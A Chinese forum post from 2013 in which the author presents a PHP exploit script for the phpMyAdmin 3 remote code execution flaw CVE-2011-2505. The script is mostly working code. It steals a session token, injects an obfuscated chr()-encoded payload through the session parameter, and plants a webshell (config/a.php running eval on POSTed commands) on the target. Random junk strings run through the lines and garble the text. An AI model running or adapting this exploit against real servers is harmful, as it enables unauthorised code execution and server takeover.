最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。6 y$ e: P. ~+ p/ Z1 y- W1 B
5 X8 P; P6 `- B6 F
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。+ v' j s) j0 d# _2 F( y4 h! y0 j
+ O% {2 d2 _5 l/ o3 e: x" ?- ~首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:9 }2 Z1 v* e9 X; p
一是session.auto_start = 1;
% c! v& J: P i# U) n4 u. o二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
( V4 O; M, p( Y# D* O( I当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
0 t$ a9 E2 d& A* @4 w! K2 I% @1 g6 s
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。9 i0 o |" L! e8 v
0 V) t* }$ z0 O$ \; j
于是写了这个php版本的exp,代码如下:
, ^8 w4 ^! b/ f% e# s
2 j4 L; `3 H. w3 }8 `#!/usr/bin/php
: G8 t N4 p6 b: z# o<?php; t0 U& Z( \$ i# N9 i, y
print_r('! P+ A9 \! A: D& @# |" b
+---------------------------------------------------------------------------+' G+ H/ g. v) T5 m8 T$ z* S* O
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
+ r2 X$ E8 `) z- d& |2 L W0 r4 c* y& qby oldjun(www.oldjun.com)9 t3 [6 |6 S0 }1 w, k
welcome to www.t00ls.net
5 {! y/ g, }) c9 a: g% J5 Amail: oldjun@gmail.com
. p5 r8 {1 m. S; \" w1 G2 {Assigned CVE id: CVE-2011-2505" U X) v6 H q0 m2 e" M+ H
+---------------------------------------------------------------------------+
( p9 {8 @( w& k6 g) o% w0 A');# N7 l/ R* \0 c3 U5 v
) U3 B" Y+ ~# b: x& o
/**
# U% f1 V: m5 j9 `$ r% U * working when the directory:"config" exists and is writeable.+ b- H+ M j4 t3 C! N
**/% Q j, ~, Y& S$ U" w
0 v6 ]5 u; H, A7 S# |1 T$ B3 c
if ($argc < 3) {
. u0 `8 [4 S0 g9 X/ f& h print_r('8 `; D) m, S/ S F; ], j$ ^
+---------------------------------------------------------------------------+
: s8 v) \) G& U# L; z8 v* |Usage: php '.$argv[0].' host path* I- O/ \- a7 j- a
host: target server (ip/hostname)* ~: b* c; L( j. \' |2 V9 h
path: path to pma3: v; _5 P1 ~5 [
Example:1 i# p2 w( e$ }' d: g- F5 Z' f9 m; w
php '.$argv[0].' localhost /pma/
' _/ a- H F5 @4 e5 f& F8 r+ _+---------------------------------------------------------------------------+
) v( M6 y* I0 N/ j3 N( W7 D');
; s ]) F7 k$ @) u9 F+ z2 c% ~9 Y exit;3 Q4 L# n4 z6 `% J+ v: R7 g; N1 h8 z- J
}# m4 }0 g7 D0 e% e2 e8 S6 N0 `
- Y+ p9 l4 G: L8 @" o( G
$host = $argv[1];
7 D5 s. k. e3 I f. B8 M$path = $argv[2];
' z4 L! n3 A3 Q8 e$ j H2 ?/ `7 N1 X2 s
/**! x0 j& @7 Z- R# L# P
* Try to determine if the directory:"config" exists' ]4 ~: x- Z" E' e4 a
**/
. i4 w1 F b+ S! y, _( j# Vecho "[+] Try to determine if the directory:config exists....\n";% `( z2 x- x, W9 O( M9 `9 h/ L
$returnstr=php_request('config/');
6 n: [) \2 x8 W- lif(strpos($returnstr,'404')){
, _ L9 x0 h* K$ o& ] exit("[-] Exploit Failed! The directory:config do not exists!\n");
' Y; H- I9 p' B( n( D}
% ^0 C# H5 B" M0 p
% i( {8 M, v/ M8 E& a/**
1 H. r) B3 x4 L, G. ^$ R! z * Try to get token and sessionid
' ]; c8 m1 b- L0 O8 [3 i( Z0 n# H**// S0 L2 {( [" ^. R) H3 Y5 N
echo "[+] Try to get token and sessionid....\n";. Z. H4 V, Z3 x: ]! Y8 n5 K# ~
$result=php_request('index.php');
o8 | }; W1 R7 g* }9 d% F- Apreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
' Y- J- J. ~% A& Q5 W$ ~$token=$resp[3];+ A3 a( n) H) C2 f+ I' f9 i
$sessionid=$resp[1];' b# p0 y4 \- g* q4 O- U
if($token && $sessionid){5 q1 y$ c y8 O' v1 X
echo "[+] token token\n";
7 y" w! C9 q5 F2 c- j4 a$ _ X echo "[+] Session IDsessionid\n";2 o6 V, \7 g8 v9 J+ n
}else{
' w& L; L. h: h0 L" [ exit("[-] Can't get token and Session ID,Exploit Failed!\n");
4 W# l; A, W7 A% i}
2 I: ~" Z5 O$ o
3 C" ]& M2 Y* G. M2 m$ _5 p/ V& v" s/**
0 d8 e8 Q& O3 ]" ?5 v5 z+ y * Try to insert shell into session
" [3 X! v2 G; r**/
4 { n {2 y6 secho "[+] Try to insert shell into session....\n";* l- X% @. q/ u9 h7 I
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
4 x3 ~# n0 ?* s' a6 E3 ^9 M) R0 q2 Z p+ a
/**7 Q* b) e# M& @) I, Q, A8 l
* Try to create webshell" V6 z1 B y2 k! S& S; c
**/" U( H& E$ C7 ^+ U2 _
echo "[+] Try to create webshell....\n";
- i( T+ R! _* Nphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
+ \+ d- M) N/ \" i$ F6 O/**
6 v4 {/ ?2 W6 p6 k9 ]: n1 X) r * Try to check if the webshell was created successfully* S' K. A X/ g i4 {3 W0 ?
**/ y2 p1 ?) o* |$ f' }& D* B
echo "[+] Try to check if the webshell was created successfully....\n";
E/ p: i5 P6 v$content=php_request('config/config.inc.php');
; U1 a$ }) n i$ `if(strpos($content,'t00ls')){- I% b- U4 e# w# `" C; V/ p
echo "[+] Congratulations! Expoilt successfully....\n";
, O( K7 F; ?' ]' U echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
& v- B) [7 L$ {( w$ a, K}else{
# M( I% C! f% j- p, A5 h. y exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");: B7 r9 ^9 v9 T4 `+ P
}
' C& k2 |: { t" J/ L. b" [- r" @2 P* q$ ^
function php_request($url,$data='',$cookie=''){
5 c0 D9 ?$ |( s$ g global $host, $path;' W% o: ~& [0 g3 F) b3 x6 F D
/ [' j* g9 p5 J( \) N# t7 R
$method=$data?'POST':'GET';
; i/ y- q- X p, d5 m: ~" ^
9 C& Q/ E" @9 d1 U0 m $packet = $method." ".$path.$url." HTTP/1.1\r\n";
" K q+ o# I/ k3 x $packet .= "Accept: */*\r\n";
/ N$ f6 i6 j; p: K) b8 l! r $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
6 q. E: n8 n5 k, h) i $packet .= "Host: $host\r\n";
. A( }4 ?- Y7 p2 m) c: I $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
( z: `( K) h0 S( d, i $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
6 Y5 w6 H, P* f& L7 N$ j$ ~ $packet .= $cookie?"Cookie: $cookie\r\n":"";
6 O0 w8 A7 q! n' L $packet .= "Connection: Close\r\n\r\n";
( i7 B$ _) A* B $packet .= $data?$data:"";
! `, `; o* r3 C8 S9 C2 f; J% {6 T! h! {
$fp = fsockopen(gethostbyname($host), 80);$ @; A6 k+ g6 V6 m4 @$ M/ X3 b
if (!$fp) {' \: h h7 W, z( k+ s, c
echo 'No response from '.$host; die;
5 y6 V6 L- v2 L8 q% z }
* t% _2 z- f. u' |3 w. w% `5 e% f fputs($fp, $packet);: l1 Z9 F1 f- ^ K. ]& W
# A, l. `+ q- w5 r- s, T $resp = '';; H: h, [0 K; U' ^. C3 S! l9 g
% I& z3 v( x5 X2 O- M while ($fp && !feof($fp))
v- P0 _& r- s1 e( p, c3 D $resp .= fread($fp, 1024);
; M0 ^2 Q$ Z" m$ f6 |0 Q g0 y
9 x, |6 r- g6 _& P! I return $resp;
9 u- y( T0 \* K$ L* W}
- s/ Q- P3 P) |4 h( l . X# _+ B4 o+ s) r; p Q
?>
* g# g, l; A/ Q( }! ^' f9 H. |
发表于 2013-2-21 09:13:03
收藏
支持
反对